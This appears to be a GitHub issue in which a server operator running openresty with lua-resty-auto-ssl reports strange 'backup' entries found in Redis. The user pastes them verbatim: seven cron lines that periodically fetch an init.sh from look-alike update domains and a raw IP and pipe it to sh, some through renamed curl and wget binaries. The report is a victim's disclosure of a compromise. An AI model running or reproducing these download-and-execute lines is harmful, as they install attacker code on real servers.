Security issue #279
Description
Dont know if here is the right place to inform.. but here it is..
i have a web server running openresty/1.19.9.1 luarocks-3.8.0 and lua-resty-auto-ssl only have 2 domains so today i check the redis storage to see the ssl keys and i notice some strange entries named backup1 to 10.
so i check the entries and they were like this
*/4 * * * * cdt -fsSL http://g.githubupdate.com/pkg/init.sh | sh
*/5 * * * * wdt -q -O- http://g.githubupdate.com/pkg/init.sh | sh
*/2 * * * * cd1 -fsSL http://a.amdupdatepkg.com/pkg/init.sh | sh
*/3 * * * * wd1 -q -O- http://a.amdupdatepkg.com/pkg/init.sh | sh
*/4 * * * * cd1 -fsSL http://g.githubupdate.com/pkg/init.sh | sh
*/5 * * * * wd1 -q -O- http://g.githubupdate.com/pkg/init.sh | sh
*/2 * * * * curl -fsSL http://190.123.45.54/pkg/init.sh | sh
i have secured my servers to only have http and https
no connection to redis
the only way to access to redis was through openresty/ lua-resty-auto-ssl e try to check logs everything but i didnt found anything.. did someone already saw this?